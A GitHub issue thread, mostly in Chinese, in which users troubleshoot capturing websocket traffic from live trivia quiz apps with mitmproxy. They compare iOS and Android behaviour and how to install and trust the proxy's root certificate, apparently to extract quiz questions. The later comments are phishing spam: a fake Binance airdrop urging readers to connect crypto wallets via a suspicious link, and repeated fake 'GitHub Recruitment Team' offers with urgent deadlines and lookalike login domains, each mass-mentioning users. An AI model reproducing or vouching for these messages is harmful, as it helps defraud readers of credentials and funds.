### ISSUE TITLE
今天中午抓不到冲顶的websocket包

### ISSUE THREAD

**Issue by wonderffee** [vanpersiexp/chongding#2]
不知道啥情况，有成功的吗？

**Comment by vanpersiexp** [comment]
@wonderffee 能抓到啊，今天中午冲顶的包，如图：
![1](https://user-images.githubusercontent.com/25918061/35469391-9feacf0e-036e-11e8-8240-d3d15adf1a02.jpg)
![2](https://user-images.githubusercontent.com/25918061/35469393-a511a62e-036e-11e8-89dd-9a9932a60d50.jpg)
![3](https://user-images.githubusercontent.com/25918061/35469394-a8ed24d0-036e-11e8-8ab4-56d9965562da.jpg)

**Comment by BelieveLuoJC** [comment]
没有问题啊，测试了下，冲顶和花椒的都可用。

**Comment by wonderffee** [comment]
@vanpersiexp @BelieveLuoJC  昨天后来再试了一下还是抓不到websocket包，把冲顶大会的app更新到最新版都不行，我用的是iPhone手机，难道你们用的Android手机

**Comment by vanpersiexp** [comment]
@wonderffee 找个Android机子吧，iPhone的证书经常有问题

**Comment by touzi** [comment]
@vanpersiexp 我正好相反, iOS 证书没遇到过问题, android 证书每一个可以使用, 估计是手机问题. (锤子 T2)

**Comment by wonderffee** [comment]
@vanpersiexp 是说用mitm.it装的那个https根证书经常有问题？但是另外一个答题app也用的websocket但是我能抓到包，而且还是wss的，能解密。不过我自己写了一个ios websocket demo app，向Mac上的ws服务器发送websocket消息mitmproxy却不能抓到包，不知道为啥，也许没走代理
@touzi 你是用mitmproxy抓iOS冲顶大会app的websocket包能成功？

**Comment by touzi** [comment]
@wonderffee 是的, 用 mitmproxy 抓 iOS 冲顶包能抓到

**Comment by vanpersiexp** [comment]
@wonderffee 证书应该用在本地自动生成的mitmproxy-ca-cert.cer，如图：
![cer](https://user-images.githubusercontent.com/25918061/35490073-ec18ee3c-04d7-11e8-81b0-c6053544e012.jpg)

**Comment by touzi** [comment]
@wonderffee 我用的是本地生成的证书, iOS 要先配置代理然后在访问 mitm.it 就可以下载本地生成的证书了.

**Comment by wonderffee** [comment]
@touzi 
```
$ openssl genrsa -out cert.key 8192
$ openssl req -new -x509 -key cert.key -out cert.crt
$ cat cert.key cert.crt > cert.pem
```
是通过上面的方式生成本地的证书吗？

**Comment by vanpersiexp** [comment]
@wonderffee 不是的。
跟mitmdump处于同一个LAN下，运行代理mitmdump，然后配置iPhone的wifi代理为手动，服务器地址为电脑ip地址，端口为mitmproxy监听的端口，默认为8080
然后iPhone访问mitm.it，这个时候如果能够代理配置正确的，那么就会出现下载安装证书的界面，安装证书后，要为这个证书开启受 SSL 信任，前往“设置”>“通用”>“关于本机”>“证书信任设置”。在“针对根证书启用完全信任”下，开启对这个证书的信任。

**Comment by wonderffee** [comment]
@vanpersiexp 那跟我的方式是一样的

**Comment by vanpersiexp** [comment]
@wonderffee @touzi 我刚才测试了，iPhone确实抓不到websocket的包，Android还能继续抓包。
你们可以试试去抓简单搜索里的dan哥答题，不过我这个也是用Android抓的。

**Comment by wonderffee** [comment]
那就是了，不是我的问题

**Comment by wonderffee** [comment]
不知道两位有没有试过抓uc疯狂夺金答题的包，我试过用Charles能抓到https包，能看到问题，但是用mitmproxy就是拦截不了

**Comment by vanpersiexp** [comment]
周末可以看看

**Comment by vanpersiexp** [comment]
@wonderffee 已更新支持UC疯狂夺金
![fkdj_3](https://user-images.githubusercontent.com/25918061/35567886-92832aec-0601-11e8-9a7a-7da2fd52fb35.jpg)
![1](https://user-images.githubusercontent.com/25918061/35567893-9bd782be-0601-11e8-9495-8f251e983d28.png)

**Comment by wonderffee** [comment]
@vanpersiexp uc 之前不是这样的，最近两天才有了主持人吧，想问一下你都是单打独斗答题还是有队友一起群语音组队答题啊，如果有的话求加入啊

**Comment by vanpersiexp** [comment]
@wonderffee 我就图一乐，平常确实没时间答题啊，今天晚饭后正好有空测试了下。

**Comment by touzi** [comment]
百万赢家测试, 中午改了解码方式, 搜索不抱错了, 但是不搜索题目了. 然后我又改了编码格式并还原解码, 然后我查看 raw_data.txt 是 utf-8 的, 但这个时候抓不到冲顶大会的题目了. 

中午测试百万能抓到题目并写入 raw_data.txt 但不能搜索题目. 测试冲顶结果不能抓题.

**Comment by touzi** [comment]
[raw_data.txt](https://github.com/vanpersiexp/chongding/files/1680552/raw_data.txt)
这是 gbk 编码抓取百万赢家的数据, 我这边还是不能搜题.

**Comment by vanpersiexp** [comment]
@touzi iPhone抓不到冲顶大会的包，没测试是否能抓到iPhone百万赢家的，可以换Android。
如果嫌这样麻烦的话，你可以试着抓简单搜索里的dan哥搜索的数据包，格式见我写的帖子回复的14楼
https://www.v2ex.com/t/426121#reply16

**Comment by SASECOMPANY** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @sunqifs7, @evelynloo, @ClaireSpace, @lisong29, @SuperSupeng, @xq840622, @894730654, @dingweiyu, @hqzh, @1551250249

**Comment by ULis3h** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
DimaJoyti, @RaoulSchaffranek, @jooit, @linbin524, @Runskey, @c4p-n1ck, @liuhaidon99, @CNZedChou, @MorganLay, @yaskhan, @benjiminio, @Jeremy-Pierce, @florian-bellotti, @nichcurtis, @pree-side, @tylerlastovich, @rodsotdia, @ryo0301, @r44cx, @ben2077

**Comment by willianfcamara** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
sidcode, @rkollar, @Riglanto, @0xpapa, @cxosmo, @luzzif, @sangho2, @MatthewFin, @nekofar, @girishramnani, @jubnzv, @eau-u4f, @steventhornton, @TommyWu-fdgkhdkgh, @MarkTangCd, @CroCrown, @dedroot, @Cheukwai456, @Web3deeper, @bestmike007

**Comment by willianfcamara** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team

**Comment by astrdev** [comment]
did a get mentioned here ?

**Comment by dsudduth** [comment]
Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
buhe, @lilhorse, @blogweb3, @malcodeman, @ing-norante, @hiromaily, @baipeng1009472720, @martin-57blocks, @ElHacker, @cranesandcaff, @NikolaiSch, @RStrydom, @zzz157, @Cristina-Gabriela, @Max-Pano, @brezal, @jafar75, @vidorge, @lianhaiming, @shalen-original

**Comment by astrdev** [comment]
Dude come on....
